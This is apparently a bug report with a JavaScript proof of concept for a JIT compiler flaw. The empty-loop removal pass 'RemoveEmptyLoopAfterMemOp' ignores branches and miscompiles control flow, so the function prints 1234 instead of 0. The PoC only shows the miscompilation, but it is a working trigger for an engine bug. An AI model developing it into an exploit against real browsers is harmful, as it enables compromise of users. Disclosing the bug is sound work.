/*
The optimizations for memory operations may leave empty loops as follows:
for(let i = 0; i < arr.length; i++){
arr[i] = 0;}
Becomes:
Memset(arr, 0, arr.length);for(let i = 0; i < arr.length; i++){// empty!
}
These empty loops will be removed by "BackwardPass::RemoveEmptyLoopAfterMemOp". But this method just removes them without considering branches.
Here's what may happen.
A:
Memset(arr, 0, arr.length);
for (let i = 0; i < arr.length; i++) {
}
goto D;// Actually, this's a "BrGe_I4" instruction in the PoC.
C:
...
D:
...
Becomes:
A:
Memset(arr, 0, arr.length);
C:
...
D:
...
So, this may break the control flow.
PoC:
*/function opt(a, b, always_true = true){
a[0] = 1234;
b[0] = 0;
let arr = a;if(always_true){
arr = b;for(let i = 0; i < arr.length; i++)
arr[i] = 0;}
let val = arr[0];if(val){
print(val);// Must be 0, but prints out 1234
return true;}return false;}
let a = new Uint32Array(1);
let b = new Uint32Array(0x1000);for(let i = 0; i < 10000; i++){if(opt(a, b)){break;}}
